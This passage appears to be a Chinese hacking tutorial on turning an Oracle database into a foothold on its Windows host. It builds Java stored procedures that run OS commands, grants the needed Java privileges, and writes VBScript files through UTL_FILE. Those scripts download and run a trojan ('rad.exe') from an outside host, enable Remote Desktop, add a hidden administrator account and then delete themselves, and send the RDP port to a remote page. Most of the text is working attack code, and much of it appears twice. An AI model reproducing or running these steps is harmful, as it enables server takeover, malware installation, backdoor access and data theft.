if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
return true;
else
return false;
}

};
/
Create or REPLACE PROCEDURE host_command (p_command  IN  VARCHAR2)
AS LANGUAGE JAVA
NAME 'Host.executeCommand (java.lang.String)';
/
EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
/
DECLARE
l_output DBMS_OUTPUT.chararr;
l_lines  INTEGER := 1000;
BEGIN
DBMS_OUTPUT.enable(1000000);
DBMS_JAVA.set_output(1000000);

host_command('dir C:\');

DBMS_OUTPUT.get_lines(l_output, l_lines);
END;这个要注意两点
win下注意系统路径
linx下注意注释掉win
最后一句就是执行命令的普通浏览复制代码打印代码
host_command('dir C:\'); 

host_command('dir C:\');no3.普通浏览复制代码打印代码
create or replace and compile 
java souRCe named "util" 
as 
import java.io.*; 
import java.lang.*; 
public class util extends Object 
{ 
public static int RunThis(String args) 
{ 
Runtime rt = Runtime.getRuntime(); 
int RC = -1; 
try 
{ 
Process p = rt.exec(args); 
int bufSize = 4096; 
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize); 
int len; 
byte buffer[] = new byte[bufSize]; 
// Echo back what the program spit out 
while ((len = bis.read(buffer, 0, bufSize)) != -1) 
System.out.write(buffer, 0, len); 
RC = p.waitFor(); 
} 
catch (Exception e) 
{ 
e.printStackTrace(); 
RC = -1; 
} 
finally 
{ 
return RC; 
} 
} 
} 
/ 
create or replace 
function RUN_CMz(p_cmd in varchar2) return number 
as 
language java 
name 'util.RunThis(java.lang.String) return integer'; 
/ 
create or replace procedure RC(p_cmd in varChar) 
as 
x number; 
begin 
x := RUN_CMz(p_cmd); 
end; 
/ 
variable x number; 
set serveroutput on; 
exec dbms_java.set_output(100000); 
grant javasyspriv to system; 

create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
/
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;这句注意最后这里要授权下当前登陆的用户普通浏览复制代码打印代码
grant javasyspriv to system 

grant javasyspriv to system最后执行普通浏览复制代码打印代码
exec :x:=run_cmz('ipconfig'); 

exec :x:=run_cmz('ipconfig');第二部分 操作磁盘文件
no1.
建立目录普通浏览复制代码打印代码
create or replace directory DIR as 'C:\'; 

create or replace directory DIR as 'C:\';此目录当然也可以是启动目录

授权普通浏览复制代码打印代码
grant read, write on directory DIR to system 

grant read, write on directory DIR to system这步可以不用
然后执行操作
写文件普通浏览复制代码打印代码
declare 
file utl_file.file_type; 
begin 
file := utl_file.fopen('DIR', 'test.vbs', 'W'); 
utl_file.put_line(file, 'Set xPost=CreateObject("Microsoft.XMLHTTP") 
xPost.Open "GET","http:/ /blog.cnmoker.org/rad.exe",0 
xPost.Send() 
Set sGet=CreateObject("ADODB.Stream") 
sGet.Mode=3 
sGet.Type=1 
sGet.Open() 
sGet.Write(xPost.responseBody) 
sGet.SaveToFile "c:\rad.exe",2'); 
utl_file.fflush(file); 
utl_file.fclose(file); 
end; 
/ 
exec :x:=run_cmz('cscript c:\test.vbs'); 
/ 
exec :x:=run_cmz('c:\rad.exe'); 

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'test.vbs', 'W');
utl_file.put_line(file, 'Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http:/ /blog.cnmoker.org/rad.exe",0
xPost.Send()
Set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\rad.exe",2');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec :x:=run_cmz('cscript c:\test.vbs');
/
exec :x:=run_cmz('c:\rad.exe');这步操作讲下载我的木马到c盘并执行普通浏览复制代码打印代码
declare 
file utl_file.file_type; 
begin 
file := utl_file.fopen('DIR', '3389.vbs', 'W'); 
utl_file.put_line(file, 'Dim OperationRegistry 
Set OperationRegistry=WScript.createObject("WScript.Shell") 
Dim TSPort,TSState,TSRegPath 
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" 
TSPort=OperationRegistry.RegRead(TSRegPath) 
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" 
TSState=OperationRegistry.RegRead(TSRegPath) 
If TSState=0 Then 
Else 
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD" 
End If'); 
utl_file.fflush(file); 
utl_file.fclose(file); 
end; 
/ 
exec :x:=run_cmz('cscript c:\3389.vbs'); 

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389.vbs', 'W');
utl_file.put_line(file, 'Dim OperationRegistry
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec :x:=run_cmz('cscript c:\3389.vbs');vbs开启3389普通浏览复制代码打印代码
declare 
file utl_file.file_type; 
begin 
file := utl_file.fopen('DIR', 'user.vbs', 'W'); 
utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK") 
os="WinNT://"'||'&'||'wsnetwork.ComputerName 
Set oa=CreateObject("Scripting.FileSystemObject") 
Set ob=GetObject(os) 
Set oe=GetObject(os&"/Administrators,group") 
Set od=ob.Create("user","bob") 
od.SetPassword "123456abc!@#" 
od.SetInfo 
Set of=GetObject(os&"/bob",user) 
oe.add os&"/bob" 
oa.DeleteFile("user.vbs")'); 
utl_file.fflush(file); 
utl_file.fclose(file); 
end; 
/ 
/ 
exec :x:=run_cmz('cscript c:\user.vbs'); 

declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'user.vbs', 'W');
utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"'||'&'||'wsnetwork.ComputerName
Set oa=CreateObject("Scripting.FileSystemObject")
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","bob")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/bob",user)
oe.add os&"/bob"
oa.DeleteFile("user.vbs")');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
/
exec :x:=run_cmz('cscript c:\user.vbs');无net添加admin用户普通浏览复制代码打印代码
declare 
file utl_file.file_type; 
begin 
file := utl_file.fopen('DIR', '3389p.vbs', 'W'); 
utl_file.put_line(file, ' 
 
Dim OperationRegistry 
Set OperationRegistry=WScript.createObject("WScript.Shell") 
Dim TSPort,TSState,TSRegPath 
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" 
TSPort=OperationRegistry.RegRead(TSRegPath) 
 
Set xPost=CreateObject("Microsoft.XMLHTTP") 
xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.asp?port=" '||'ccccc'||' TSPort,0 
xPost.Send() 
 
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" 
TSState=OperationRegistry.RegRead(TSRegPath) 
If TSState=0 Then 
Else 
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD" 
End If 
set obj=wscript.createObject("wscript.shell") 
obj.Run("sc config TermService start= demand") 
obj.Run("sc stop  TermService") 
obj.Run("sc start TermService") 
wscript.quit 
'); 
utl_file.fflush(file); 
utl_file.fclose(file); 
end; 
/ 
exec :x:=run_cmz('cscript c:\3389p.vbs');